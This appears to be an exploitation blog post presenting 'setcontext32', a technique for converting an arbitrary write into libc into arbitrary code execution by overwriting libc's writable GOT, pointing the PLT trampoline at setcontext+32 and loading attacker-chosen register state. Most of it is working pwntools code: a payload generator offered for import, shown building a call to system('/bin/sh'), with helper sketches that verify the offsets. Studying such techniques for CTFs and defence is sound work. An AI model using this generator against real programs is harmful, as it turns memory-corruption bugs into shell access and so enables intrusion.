Currently, converting an arbitrary write primitive into RCE is a messy process.
The good old days of __free_hook are long gone; now you’ve got to leak the ptr
mangling cookie to modify an existing __exit_funcs entry, maybe compute the
offset to ld.so to overwrite l_addr and create a fake DT_FINI entry, or
perhaps set up special _codecvt and _wide_data structures on hijacked IO
objects… I’d just like to specify the function I want to call and its
arguments!
I want a flexible RCE primitive. I don’t want to rely on _IO_cleanup,
_dl_fini, or malloc to call my injected code. I want an inherently universal
gadget, a gadget I can expect to be called with the most messed up heap bins and
broken IO objects. I want to be able to call any function with any set of
arguments without needing to stack pivot or pray system is stack aligned. I
don’t want to satisfy several constraints so one_gadget will work!
setcontext32 is a neat method to convert an arbitrary write into flexible arbitrary code execution. Roughly, it looks like:
write(libc_write_address, flat(
    p64(0),
    p64(libc_write_address + 0x218),
    p64(setcontext+32),
    p64(libc_exe_address) * 0x40,
    cpu_state_information,
))
Where libc_write_address is the start of the writeable page in libc,
libc_exe_address is the start of the executable page in libc, and
cpu_state_information is a structure that holds the register values you want
loaded, including rsp and rip.
Every GOT entry in libc, such as memset, memcpy, strcpy, and strlen, is
replaced with the address of the PLT trampoline, which sits at the beginning
of the executable page. The PLT trampoline pushes a fake link_map pointer,
libc_write_address + 0x218, and jumps to a fake runtime resolver,
setcontext+32; both values are read from the start of the writeable page.
setcontext+32 pops libc_write_address + 0x218 off the stack and treats it
as a pointer to a saved ucontext_t. It’ll then load your structure as the
current CPU state.
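The 0x218 offset falls out of the layout sketched earlier: three header qwords followed by 0x40 sprayed entries, with the CPU state right after. Here's a minimal sketch of that arithmetic using only struct and placeholder addresses. The names HEADER_QWORDS, SPRAYED_ENTRIES, ucontext_offset, and build_layout are mine and purely illustrative.

```python
import struct

HEADER_QWORDS = 3       # slot 0, fake link_map pointer, fake resolver
SPRAYED_ENTRIES = 0x40  # GOT slots overwritten with the PLT trampoline address


def ucontext_offset() -> int:
    """Byte offset of the saved CPU state from the start of the write."""
    return 8 * (HEADER_QWORDS + SPRAYED_ENTRIES)


def build_layout(write_addr: int, resolver: int, trampoline: int,
                 cpu_state: bytes) -> bytes:
    """Pack the same five pieces as the rough payload, little-endian."""
    header = struct.pack("<3Q", 0, write_addr + ucontext_offset(), resolver)
    spray = struct.pack("<Q", trampoline) * SPRAYED_ENTRIES
    return header + spray + bytes(cpu_state)


if __name__ == "__main__":
    # Placeholder addresses, chosen only to make the arithmetic visible.
    blob = build_layout(0x7F0000200000, 0x7F0000050020, 0x7F0000028000,
                        bytes(0x200))
    print(hex(ucontext_offset()), hex(len(blob)))
```

So the pointer stored in the second slot lands exactly on the first byte of the CPU state, as long as the spray count stays at 0x40. Change the count and the offset has to move with it.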
Calling most libc functions will trigger setcontext32, including malloc,
exit, and (almost?) every IO operation.
libc’s GOT is writeable so that libc can pick architecture-specific
implementations at runtime, such as a memcpy optimized for SSE or AVX512. A
friend also guessed that it could be for ltrace. I learned the libc GOT was
writeable from pwndbg creator disconnect3d.
Here’s code you can readily import to generate setcontext32 payloads (or
integrate into your pwn libraries). An example is below.
setcontext32.py:
from pwn import *


def create_ucontext(
    src: int,
    rsp=0,
    rbx=0,
    rbp=0,
    r12=0,
    r13=0,
    r14=0,
    r15=0,
    rsi=0,
    rdi=0,
    rcx=0,
    r8=0,
    r9=0,
    rdx=0,
    rip=0xDEADBEEF,
) -> bytearray:
    b = bytearray(0x200)
    b[0xE0:0xE8] = p64(src)  # fldenv ptr
    b[0x1C0:0x1C8] = p64(0x1F80)  # ldmxcsr
    b[0xA0:0xA8] = p64(rsp)
    b[0x80:0x88] = p64(rbx)
    b[0x78:0x80] = p64(rbp)
    b[0x48:0x50] = p64(r12)
    b[0x50:0x58] = p64(r13)
    b[0x58:0x60] = p64(r14)
    b[0x60:0x68] = p64(r15)
    b[0xA8:0xB0] = p64(rip)  # ret ptr
    b[0x70:0x78] = p64(rsi)
    b[0x68:0x70] = p64(rdi)
    b[0x98:0xA0] = p64(rcx)
    b[0x28:0x30] = p64(r8)
    b[0x30:0x38] = p64(r9)
    b[0x88:0x90] = p64(rdx)
    return b


def setcontext32(libc: ELF, **kwargs) -> (int, bytes):
    # Start of libc's GOT (DT_PLTGOT) and of its .plt section (the PLT trampoline).
    got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT")
    plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr
    return got, flat(
        p64(0),
        p64(got + 0x218),
        p64(libc.symbols["setcontext"] + 32),
        p64(plt_trampoline) * 0x40,
        create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs),
    )


if __name__ == "__main__":
    libc = ELF("./libc.so.6")
    # Set libc.address to the leaked base before building a real payload;
    # left at 0, the printed addresses are relative to the libc base.
    dest, payload = setcontext32(
        libc, rip=libc.sym["system"], rdi=next(libc.search(b"/bin/sh"))
    )
    print(hex(dest), payload.hex())
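The offsets hard-coded in create_ucontext line up with glibc's x86-64 ucontext_t, where the general registers live in a gregs array that starts at 0x28. Here's a rough sketch that derives each offset from the register order instead of hard-coding it. It assumes that layout and uses hypothetical helper names (greg_offset, set_regs, get_reg), so treat it as a way to double-check the table rather than a replacement for the generator.

```python
import struct

# Assumed layout: uc_flags (8) + uc_link (8) + uc_stack (24) precede gregs.
GREGS_BASE = 0x28

# Register order of the gregs array in glibc's x86-64 <sys/ucontext.h>.
GREG_ORDER = [
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
]


def greg_offset(name: str) -> int:
    """Offset of a general register inside the ucontext buffer."""
    return GREGS_BASE + 8 * GREG_ORDER.index(name)


def set_regs(buf: bytearray, **regs: int) -> None:
    """Write each named register into buf as a little-endian qword."""
    for name, value in regs.items():
        struct.pack_into("<Q", buf, greg_offset(name), value)


def get_reg(buf: bytes, name: str) -> int:
    """Read a named register back out of buf."""
    return struct.unpack_from("<Q", buf, greg_offset(name))[0]


if __name__ == "__main__":
    ctx = bytearray(0x200)
    set_regs(ctx, rdi=0x1234, rip=0xDEADBEEF)
    for name in ("rdi", "rsi", "rsp", "rip"):
        print(name, hex(greg_offset(name)), hex(get_reg(ctx, name)))
```

The derived offsets match the ones in the listing (for instance rsp at 0xA0 and rip at 0xA8), which is a quick way to catch a typo if you port the generator to another library.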